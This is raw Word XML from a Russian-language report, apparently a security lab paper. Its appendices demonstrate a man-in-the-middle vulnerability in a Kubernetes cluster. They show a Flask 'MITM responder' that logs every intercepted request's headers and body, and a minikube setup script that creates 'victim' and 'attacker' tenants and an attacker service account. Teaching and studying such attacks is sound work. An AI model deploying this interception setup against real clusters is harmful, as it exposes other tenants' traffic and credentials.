      <w:bookmarkEnd w:id="58"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>приложение А</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="4D35E9CF" w14:textId="69936857" w:rsidR="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:r>
        <w:t>Демонстрация уязвимости:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435F8D8F" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00AA223A" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA223A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flask</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA223A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA223A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flask</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA223A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C682D0" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00AA223A" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31953390" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>app = Flask(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E7F886" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35360505" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>app.route</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>("/", defaults</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>={</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">"path": </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>""}</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, methods</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GET", "POST", "PUT", "DELETE", "PATCH"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746B7092" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>app.route</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>("/&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>path:path</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;", methods</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GET", "POST", "PUT", "DELETE", "PATCH"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CA967C" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>def catch_all(path):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFC0037" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f"{request.method</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>} /{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>path}"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, flush=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A130C5" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    for key, value in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>request.headers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>items(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D8D9E5" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f"{key}: {value}"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, flush=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082C085A" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    if request.data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C49163A" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8334F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F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"BODY:", request.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data.decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(errors="replace"), flush=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE66505" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    return "MITM Flask responder\n", 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BE4244" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2500EF31" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE4DF07" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00F8334F" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103094E" w14:textId="7A4CDA2B" w:rsidR="00F8334F" w:rsidRPr="00AA223A" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>app.run(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F8334F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>host="0.0.0.0", port=5000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159535D4" w14:textId="77777777" w:rsidR="00F8334F" w:rsidRPr="00AA223A" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE2CB7A" w14:textId="06A4DE51" w:rsidR="00F8334F" w:rsidRPr="00AA223A" w:rsidRDefault="00F8334F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA223A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF1787A" w14:textId="2C16FC0D" w:rsidR="00F8334F" w:rsidRPr="00AA223A" w:rsidRDefault="00F8334F" w:rsidP="00F8334F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc231834659"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA223A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Б</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
    </w:p>
    <w:p w14:paraId="548367FA" w14:textId="5038C972" w:rsidR="00625519" w:rsidRPr="00AA223A" w:rsidRDefault="00F8334F" w:rsidP="00625519">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA223A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1 – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>starter.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534BE684" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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>eval $(minikube docker-env --unset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D741B4" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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A005182" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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 xml:space="preserve">minikube </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delete</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p minikube</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5943CE21" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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1947A307" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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>minikube start \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C46119E" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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 xml:space="preserve">  --driver=docker \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571EBE94" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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 xml:space="preserve">  --kubernetes-version=v1.33.1 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5182080F" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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 xml:space="preserve">  --nodes=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C0E8E" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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26470EAA" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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>kubectl label node minikube-m02 tenant=victim --overwrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0A68A0" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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>kubectl label node minikube-m03 tenant=attacker --overwrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5C85F0" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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018B0A6E" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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>kubectl get nodes --show-labels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1BC0F4" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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>kubectl get pods -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n kube</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B5183F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C623D1" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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>kubectl get pods -n kube-system -l k8s-app=kube-proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6158B954" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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23CAB265" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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>kubectl create namespace tenant-a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322A8F3B" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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>kubectl create namespace tenant-b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C5894D" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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263111A9" w14:textId="77777777" w:rsidR="00EB4A58" w:rsidRPr="00B5183F" w:rsidRDefault="00EB4A58" w:rsidP="00EB4A58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>kubectl -n tenant-b create serviceaccount attacker</w:t>
      </w:r>
    </w:p>
